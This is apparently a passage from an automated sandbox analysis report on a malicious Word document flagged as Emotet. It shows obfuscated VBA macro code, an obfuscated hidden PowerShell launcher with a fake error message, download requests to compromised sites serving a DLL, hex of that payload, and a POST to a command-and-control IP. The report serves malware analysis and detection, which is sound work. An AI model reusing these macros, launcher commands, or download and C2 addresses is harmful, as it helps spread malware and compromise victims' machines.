                                            Set RjiQHRA = Nothing
                                            Set wTMSLyWFG = AioOpBFE
                                            Set mgrwfmN = Nothing
                                            mgrwfmN:
                                            End Function
                                            Function Hrs2a1p95u19(Svk60sycz63sk)
                                            Q491417n8n1 = Pg5minli2d3c9
                                               GoTo uWZkeMFv
                                            Dim zDsRaIBGF As Object
                                            Set ViWsSIH = sreXHFD
                                            Set zDsRaIBGF = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim uWZkeMFv As Object
                                            Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                                            uWZkeMFv.WriteLine "CcDmClHsnCC"
                                            uWZkeMFv.WriteLine "aqGiHISIbAoabV"
                                            uWZkeMFv.WriteLine "nJJzFRjEWpRikxCD"
                                            Set QOrvJEB = eCIzUDyJ
                                            uWZkeMFv.Close
                                            Set zDsRaIBGF = Nothing
                                            Set UskmBJF = yJmmmVIAG
                                            Set uWZkeMFv = Nothing
                                            uWZkeMFv:
                                            Hrs2a1p95u19 = Replace(Svk60sycz63sk, "]a" + "nw[3", Ij2hesgjee57d3s0)
                                               GoTo iHKuDmaEr
                                            Dim OMZxxg As Object
                                            Set drZcHkCm = uVItICICB
                                            Set OMZxxg = CreateObject(Jlda77h_v8nx5("]anw[3Sc]anw[3ripti]anw[3ng.Fil]anw[3eSyst]anw[3emOb]anw[3ject]anw[3"))
                                            Dim iHKuDmaEr As Object
                                            Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                                            iHKuDmaEr.WriteLine "syYTHJShrguhzb"
                                            iHKuDmaEr.WriteLine "TubioGUTLadgXbA"
                                            iHKuDmaEr.WriteLine "oLweAMoGsqVE"
                                            Set noebIvSiu = anyPG
                                            iHKuDmaEr.Close
                                            Set OMZxxg = Nothing
                                            Set NXbmIuHX = YVZXECEHD
                                            Set iHKuDmaEr = Nothing
                                            iHKuDmaEr:
                                            End Function
                                            VBA File Name: Zdjtk46nm17voo, Stream Size: 701
                                            General
                                            Stream Path: Macros/VBA/Zdjtk46nm17voo
                                            VBA File Name: Zdjtk46nm17voo
                                            Stream Size: 701

                                            VBA Code Keywords

                                            Keyword
                                            Attribute
                                            VB_Name
                                            VBA Code
                                            Attribute VB_Name = "Zdjtk46nm17voo"

                                            Streams

                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                            General
                                            Stream Path: \x1CompObj
                                            File Type: data
                                            Stream Size: 146
                                            Entropy: 4.00187355764
                                            Base64 Encoded: False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path: \x5DocumentSummaryInformation
                                            File Type: data
                                            Stream Size: 4096
                                            Entropy: 0.280929556603
                                            Base64 Encoded: False
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 492
                                            General
                                            Stream Path: \x5SummaryInformation
                                            File Type: data
                                            Stream Size: 492
                                            Entropy: 3.85482742554
                                            Base64 Encoded: False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                            Stream Path: 1Table, File Type: data, Stream Size: 6412
                                            General
                                            Stream Path: 1Table
                                            File Type: data
                                            Stream Size: 6412
                                            Entropy: 6.14518057053
                                            Base64 Encoded: True
                                            Stream Path: Data, File Type: data, Stream Size: 99192
                                            General
                                            Stream Path: Data
                                            File Type: data
                                            Stream Size: 99192
                                            Entropy: 7.3901039161
                                            Base64 Encoded: True
                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524
                                            General
                                            Stream Path: Macros/PROJECT
                                            File Type: ASCII text, with CRLF line terminators
                                            Stream Size: 524
                                            Entropy: 5.52955915132
                                            Base64 Encoded: True
                                            Data ASCII:I D = " { 9 1 6 F 7 B 9 1 - 5 D 2 F - 4 2 F E - 8 5 A 0 - A 5 1 0 E E 1 5 7 0 3 4 } " . . D o c u m e n t = A 5 g d 2 1 k l f q u 9 c 6 r s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z d j t k 4 6 n m 1 7 v o o . . M o d u l e = O w p p n p 8 h a h 4 x o 7 8 8 . . E x e N a m e 3 2 = " F b 5 d 3 b h _ _ k e _ c w 4 p 7 7 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 4 2 6 E E C 5 1 6 F E 1 A F E 1 A F E 1 A F E 1
                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149
                                            General
                                            Stream Path: Macros/PROJECTwm
                                            File Type: data
                                            Stream Size: 149
                                            Entropy: 3.96410774314
                                            Base64 Encoded: False
                                            Data ASCII:A 5 g d 2 1 k l f q u 9 c 6 r s . A . 5 . g . d . 2 . 1 . k . l . f . q . u . 9 . c . 6 . r . s . . . Z d j t k 4 6 n m 1 7 v o o . Z . d . j . t . k . 4 . 6 . n . m . 1 . 7 . v . o . o . . . O w p p n p 8 h a h 4 x o 7 8 8 . O . w . p . p . n . p . 8 . h . a . h . 4 . x . o . 7 . 8 . 8 . . . . .
                                            Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5216
                                            General
                                            Stream Path: Macros/VBA/_VBA_PROJECT
                                            File Type: data
                                            Stream Size: 5216
                                            Entropy: 5.49741129349
                                            Base64 Encoded: True
                                            Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 675
                                            General
                                            Stream Path: Macros/VBA/dir
                                            File Type: data
                                            Stream Size: 675
                                            Entropy: 6.39671072877
                                            Base64 Encoded: True
                                            Stream Path: WordDocument, File Type: data, Stream Size: 21038
                                            General
                                            Stream Path: WordDocument
                                            File Type: data
                                            Stream Size: 21038
                                            Entropy: 4.09747048154
                                            Base64 Encoded: True

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                            01/06/21-08:45:13.475728 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.2.22 | 8.8.8.8
                                            01/06/21-08:45:14.495052 | ICMP | 402 | ICMP Destination Unreachable Port Unreachable |  |  | 192.168.2.22 | 8.8.8.8

                                            Network Port Distribution

                                            TCP Packets

                                            Jan 6, 2021 08:46:36.777899027 CET4916980192.168.2.225.2.136.90

                                            UDP Packets


                                            ICMP Packets

                                            Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                            Jan 6, 2021 08:45:13.475728035 CET | 192.168.2.22 | 8.8.8.8 | d00a | (Port unreachable) | Destination Unreachable
                                            Jan 6, 2021 08:45:14.495052099 CET | 192.168.2.22 | 8.8.8.8 | d00a | (Port unreachable) | Destination Unreachable

                                            DNS Queries

                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                            Jan 6, 2021 08:45:09.628824949 CET | 192.168.2.22 | 8.8.8.8 | 0x51f2 | Standard query (0) | wpsapk.com | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:09.819693089 CET | 192.168.2.22 | 8.8.8.8 | 0x4aa4 | Standard query (0) | sofsuite.com | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:10.005924940 CET | 192.168.2.22 | 8.8.8.8 | 0x70c0 | Standard query (0) | veterinariadrpopui.com | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:10.403311014 CET | 192.168.2.22 | 8.8.8.8 | 0x3714 | Standard query (0) | shop.elemenslide.com | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:11.413362026 CET | 192.168.2.22 | 8.8.8.8 | 0x3714 | Standard query (0) | shop.elemenslide.com | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:12.427134991 CET | 192.168.2.22 | 8.8.8.8 | 0x3714 | Standard query (0) | shop.elemenslide.com | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:12.474410057 CET | 192.168.2.22 | 8.8.8.8 | 0xa6ed | Standard query (0) | khanhhoahomnay.net | A (IP address) | IN (0x0001)

                                            DNS Answers

                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                            Jan 6, 2021 08:45:09.685398102 CET | 8.8.8.8 | 192.168.2.22 | 0x51f2 | No error (0) | wpsapk.com | | 104.18.61.59 | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:09.685398102 CET | 8.8.8.8 | 192.168.2.22 | 0x51f2 | No error (0) | wpsapk.com | | 104.18.60.59 | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:09.685398102 CET | 8.8.8.8 | 192.168.2.22 | 0x51f2 | No error (0) | wpsapk.com | | 172.67.141.14 | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:09.886931896 CET | 8.8.8.8 | 192.168.2.22 | 0x4aa4 | No error (0) | sofsuite.com | | 104.27.145.251 | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:09.886931896 CET | 8.8.8.8 | 192.168.2.22 | 0x4aa4 | No error (0) | sofsuite.com | | 172.67.158.72 | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:09.886931896 CET | 8.8.8.8 | 192.168.2.22 | 0x4aa4 | No error (0) | sofsuite.com | | 104.27.144.251 | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:10.062089920 CET | 8.8.8.8 | 192.168.2.22 | 0x70c0 | No error (0) | veterinariadrpopui.com | | 209.59.139.39 | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:12.464422941 CET | 8.8.8.8 | 192.168.2.22 | 0x3714 | Server failure (2) | shop.elemenslide.com | none | none | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:12.530816078 CET | 8.8.8.8 | 192.168.2.22 | 0xa6ed | No error (0) | khanhhoahomnay.net | | 210.86.239.69 | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:13.475646019 CET | 8.8.8.8 | 192.168.2.22 | 0x3714 | Server failure (2) | shop.elemenslide.com | none | none | A (IP address) | IN (0x0001)
                                            Jan 6, 2021 08:45:14.494803905 CET | 8.8.8.8 | 192.168.2.22 | 0x3714 | Server failure (2) | shop.elemenslide.com | none | none | A (IP address) | IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • wpsapk.com
                                            • sofsuite.com
                                            • veterinariadrpopui.com
                                            • khanhhoahomnay.net
                                            • 5.2.136.90

                                            HTTP Packets

                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            0 | 192.168.2.22 | 49165 | 104.18.61.59 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 6, 2021 08:45:09.751085043 CET | 0 | OUT | GET /wp-admin/v/ HTTP/1.1
                                            Host: wpsapk.com
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:09.806808949 CET | 1 | IN | HTTP/1.1 200 OK
                                            Date: Wed, 06 Jan 2021 07:45:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Set-Cookie: __cfduid=d221298cac29a42f50dcdd09dcc6b15471609919109; expires=Fri, 05-Feb-21 07:45:09 GMT; path=/; domain=.wpsapk.com; HttpOnly; SameSite=Lax
                                            X-Frame-Options: SAMEORIGIN
                                            cf-request-id: 077841329b0000c78df6240000000001
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FLiijikAq1yY5im%2FIn1m0VtxDMUfFiQ8BMCPtMp3GNvn9ZyFRC%2FrDigSlLkdodQ20cvVRacEfupGVCZjEW0vg9MtdQR7Q1SBOfsp"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 60d3d16428b1c78d-AMS
                                            Data Ascii: 10d4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,in


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            1 | 192.168.2.22 | 49166 | 104.27.145.251 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 6, 2021 08:45:09.938826084 CET | 6 | OUT | GET /wp-includes/2jm3nIk/ HTTP/1.1
                                            Host: sofsuite.com
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:09.997203112 CET | 7 | IN | HTTP/1.1 200 OK
                                            Date: Wed, 06 Jan 2021 07:45:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Set-Cookie: __cfduid=d04c9b9fb7e02b7ebebe0ca82b9ae3faa1609919109; expires=Fri, 05-Feb-21 07:45:09 GMT; path=/; domain=.sofsuite.com; HttpOnly; SameSite=Lax
                                            X-Frame-Options: SAMEORIGIN
                                            cf-request-id: 07784133570000410ec883f000000001
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=k%2FHK4LVc0OWoEqoA6xqJR%2BidQk%2BEpiHeBJ5Uo%2FBOjXVc5C4OawfY9qh%2BKgwfdm80OopzZZ%2BzV4oWjY8BrJTNUmi76ipi8m7WWqLCMt4%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 60d3d1655bae410e-PRG
                                            Data Ascii: 10dd<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            2 | 192.168.2.22 | 49167 | 209.59.139.39 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 6, 2021 08:45:10.223018885 CET | 12 | OUT | GET /content/5f18Q/ HTTP/1.1
                                            Host: veterinariadrpopui.com
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:10.383809090 CET | 13 | IN | HTTP/1.1 500 Internal Server Error
                                            Date: Wed, 06 Jan 2021 07:45:10 GMT
                                            Server: Apache
                                            Content-Length: 7309
                                            Connection: close
                                            Content-Type: text/html
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>509 Bandwidth Limit Exceeded</TITLE></HEAD><BODY><H1>Bandwidth Limit Exceeded</H1>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            3 | 192.168.2.22 | 49168 | 210.86.239.69 | 80 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Jan 6, 2021 08:45:12.797415972 CET | 21 | OUT | GET /wordpress/CGMC/ HTTP/1.1
                                            Host: khanhhoahomnay.net
                                            Connection: Keep-Alive
                                            Jan 6, 2021 08:45:13.071660995 CET | 22 | IN | HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 06 Jan 2021 07:45:13 GMT
                                            Content-Type: application/octet-stream
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Keep-Alive: timeout=60
                                            X-Powered-By: PHP/7.4.9
                                            Set-Cookie: 5ff56a8915748=1609919113; expires=Wed, 06-Jan-2021 07:46:13 GMT; Max-Age=60; path=/
                                            Cache-Control: no-cache, must-revalidate
                                            Pragma: no-cache
                                            Last-Modified: Wed, 06 Jan 2021 07:45:13 GMT
                                            Expires: Wed, 06 Jan 2021 07:45:13 GMT
                                            Content-Disposition: attachment; filename="rJGdausK.dll"
                                            Content-Transfer-Encoding: binary
                                            Data Ascii: 1dd7MZ@!L!This program cannot be run in DOS mode.$:wTwTwTwTwTwT-wT-wTwUSwT-wTwTwTwTwwTwTRichwTPEL_!JE0P 8@.text `.rdataJL@@.data- @.rsrc P@@.relocH@B
                                            Jan 6, 2021 08:45:13.071696997 CET23INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: U
                                            Jan 6, 2021 08:45:13.071721077 CET25INData Raw: cc cc cc cc cc cc e9 cb 10 00 00 cc cc cc cc cc cc cc cc cc cc cc e9 1b 14 00 00 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 0c 53 56 57 8b 7d 08 8b 1f 8b 77 04 83 bb 84 00 00 00 00 89 75 08 0f 84 48 01 00 00 8b 9b 80 00 00 00 03 de 6a 14 53
                                            Data Ascii: USVW}wuHjS],ICw(PGuGPwGOGtE4KsutE+Mw(1y
                                            Jan 6, 2021 08:45:13.071741104 CET26INData Raw: 8b 75 08 85 f6 74 7c 83 7e 10 00 74 11 8b 06 8b 4e 04 8b 40 28 6a 00 6a 00 51 03 c1 ff d0 83 7e 08 00 74 3a 57 33 ff 39 7e 0c 7e 1c 8b 46 08 8b 04 b8 85 c0 74 0c ff 76 28 50 8b 46 24 ff d0 83 c4 08 47 3b 7e 0c 7c e4 8b 46 08 5f 85 c0 74 0e 68 00
                                            Data Ascii: ut|~tN@(jjQ~t:W39~~Ftv(PF$G;~|F_thjPFthjPVjxPt^]UEHMx|ujl3]PxDUEtztSVuWuB;r]+rr Z$3
                                            Jan 6, 2021 08:45:13.071764946 CET27INData Raw: 00 00 03 d9 89 5d 08 8b 03 85 c0 74 65 56 57 8d 49 00 03 c1 8d 7b 04 89 45 fc 8b 07 83 e8 08 33 f6 8d 53 08 a9 fe ff ff ff 76 3a 8b 5d fc 8d 64 24 00 0f b7 02 8b c8 81 e1 00 f0 00 00 81 f9 00 30 00 00 75 0b 8b 4d 0c 25 ff 0f 00 00 01 0c 18 8b 07
                                            Data Ascii: ]teVWI{E3Sv:]d$0uM%F;r]M]u_^[]UUtEVu+@Ju^]VF8FLNtQPFNtQPFN
                                            Jan 6, 2021 08:45:13.071787119 CET29INData Raw: 10 53 68 c0 d4 00 10 6a 01 6a 00 68 b0 d4 00 10 ff 15 c0 d1 00 10 85 c0 0f 88 b2 00 00 00 8b 0b 0f 57 c0 66 0f d6 45 f0 b8 0d 00 00 00 66 89 45 f0 8b 45 0c 66 0f d6 45 f8 f3 0f 7e 45 f0 89 45 f8 8d 45 08 50 83 ec 10 8b c4 c7 45 08 00 00 00 00 8b
                                            Data Ascii: ShjjhWfEfEEfE~EEEPEf~EQf@u=f}u6O=x-UOQhRxEG_^[]@tQP_^[]_^[]3
                                            Jan 6, 2021 08:45:13.071801901 CET29INData Raw: 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 10 8b 55 0c 56 57 ff 75 14 8b 7d 08 85 c0 8b 37 0f 45 d0 52 57 89 4d fc ff 96 94 00 00 00 85 c0 74 3a 8b 45 fc 8d 55 08 8b 40 18 52 ff 75 0c c7 45 08 00 00 00 00 8b 08 50 ff 91 bc 00 00
                                            Data Ascii: ]UQEUVWu}7ERWMt:EU@RuEPxuuWPTMQR_^]UQS{CuFPhtEx5VWX
                                            Jan 6, 2021 08:45:13.071822882 CET31INData Raw: 32 30 30 30 0d 0a d3 00 10 bf 05 00 00 00 90 56 8b cb e8 c8 01 00 00 83 c6 0c 4f 75 f2 8b cb e8 1b 00 00 00 8b cb e8 74 03 00 00 8b 45 fc 5f 5e 5b 8b e5 5d c3 33 c0 5b 8b e5 5d c3 cc cc cc 55 8b ec 83 ec 5c a1 58 21 01 10 33 c5 89 45 fc 8b c1 8d
                                            Data Ascii: 2000VOutE_^[]3[]U\X!3EME@QEhPLEEVURPQ %W39}SlEUREWPQEEURhPEUWRfEf
                                            Jan 6, 2021 08:45:13.071844101 CET32INData Raw: f0 85 f6 78 45 83 7d e4 02 75 3f 8b 43 1c 8d 55 d0 52 0f 57 c0 8d 55 e8 66 0f d6 45 d0 66 0f d6 45 d8 8b 08 52 50 ff 51 14 8b f0 85 f6 78 1b 8d 45 d0 50 8d 45 e8 50 8b cb e8 27 00 00 00 8b f0 8d 45 d0 50 ff 15 b0 d1 00 10 47 85 f6 79 86 8b c6 8b
                                            Data Ascii: xE}u?CURWUfEfERPQxEPEP'EPGyM_^3[]UHX!3ESVuW}hjP?hPVxPWdCRPv
                                            Jan 6, 2021 08:45:13.071908951 CET33INData Raw: 00 83 c4 10 85 c0 78 0b 3d ff 01 00 00 77 04 75 0d eb 05 be 7a 00 07 80 33 c0 66 89 45 fa 85 f6 0f 88 84 00 00 00 ff 75 18 ff 15 a0 d0 00 10 03 c0 50 ff 75 18 8d 85 fc fb ff ff 6a 01 ff b5 f4 fb ff ff 50 53 ff 15 00 d0 00 10 8b f0 85 f6 7e 0b 0f
                                            Data Ascii: x=wuz3fEuPujPS~xLju=jh|WthWuhWtjM_^3[R]UX!3EES]VEW}
                                            Jan 6, 2021 08:45:13.336631060 CET35INData Raw: 5e 10 83 e9 30 66 0f 6f 46 20 66 0f 6f 6e 30 8d 76 30 83 f9 30 66 0f 6f d3 66 0f 3a 0f d9 08 66 0f 7f 1f 66 0f 6f e0 66 0f 3a 0f c2 08 66 0f 7f 47 10 66 0f 6f cd 66 0f 3a 0f ec 08 66 0f 7f 6f 20 8d 7f 30 7d b7 8d 76 08 eb 56 66 0f 6f 4e fc 8d 76
                                            Data Ascii: ^0foF fon0v00fof:ffof:fGfof:fo 0}vVfoNvfo^0foF fon0v00fof:ffof:fGfof:fo 0}v|ovfsvs~vf;u


                                            Session ID:4
                                            Source IP:192.168.2.22
                                            Source Port:49169
                                            Destination IP:5.2.136.90
                                            Destination Port:80
                                            Process:C:\Windows\SysWOW64\rundll32.exe

                                            Timestamp:Jan 6, 2021 08:45:31.116019964 CET
                                            kBytes transferred:221
                                            Direction:OUT
                                            Data:
                                            POST /6tycsc/ HTTP/1.1
                                            DNT: 0
                                            Referer: 5.2.136.90/6tycsc/
                                            Content-Type: multipart/form-data; boundary=----------OGLPvif2cE
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 5.2.136.90
                                            Content-Length: 7412
                                            Connection: Keep-Alive
                                            Cache-Control: no-cache

                                            Timestamp:Jan 6, 2021 08:45:31.780097008 CET
                                            kBytes transferred:230
                                            Direction:IN
                                            Data:
                                            HTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Wed, 06 Jan 2021 07:45:32 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Vary: Accept-Encoding


                                            System Behavior

                                            General

                                            Start time:08:44:40
                                            Start date:06/01/2021
                                            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                            Imagebase:0x13fe70000
                                            File size:1424032 bytes
                                            MD5 hash:95C38D04597050285A18F66039EDB456
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:08:44:42
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD [encoded command not preserved in this copy]
                                            Imagebase:0x4a370000
                                            File size:345088 bytes
                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:08:44:43
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\msg.exe
                                            Wow64 process (32bit):false
                                            Commandline:msg user /v Word experienced an error trying to open the file.
                                            Imagebase:0xffc10000
                                            File size:26112 bytes
                                            MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:08:44:43
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:POwersheLL -w hidden -ENCOD [encoded command not preserved in this copy]
                                            Imagebase:0x13fed0000
                                            File size:473600 bytes
                                            MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2107717841.0000000001CA6000.00000004.00000001.sdmp, Author: Florian Roth
                                            • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000005.00000002.2107604650.00000000003D6000.00000004.00000001.sdmp, Author: Florian Roth
                                            Reputation:high

                                            General

                                            Start time:08:44:50
                                            Start date:06/01/2021
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                            Imagebase:0xffde0000
                                            File size:45568 bytes
                                            MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate

                                            General

                                            Start time:08:44:50
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2109584189.0000000000221000.00000020.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.2109532201.0000000000200000.00000040.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:44:51
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gpnlsmsow\geunbjvu.dkg',Control_RunDLL
                                            Imagebase:0xa10000
                                            File size:44544 bytes
                                            MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2111056339.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Author: Joe Security
                                            Reputation:moderate

                                            General

                                            Start time:08:44:51
                                            Start date:06/01/2021
                                            Path:C:\Windows\SysWOW64\rundll32.exe
                                            Wow64 process (32bit):true
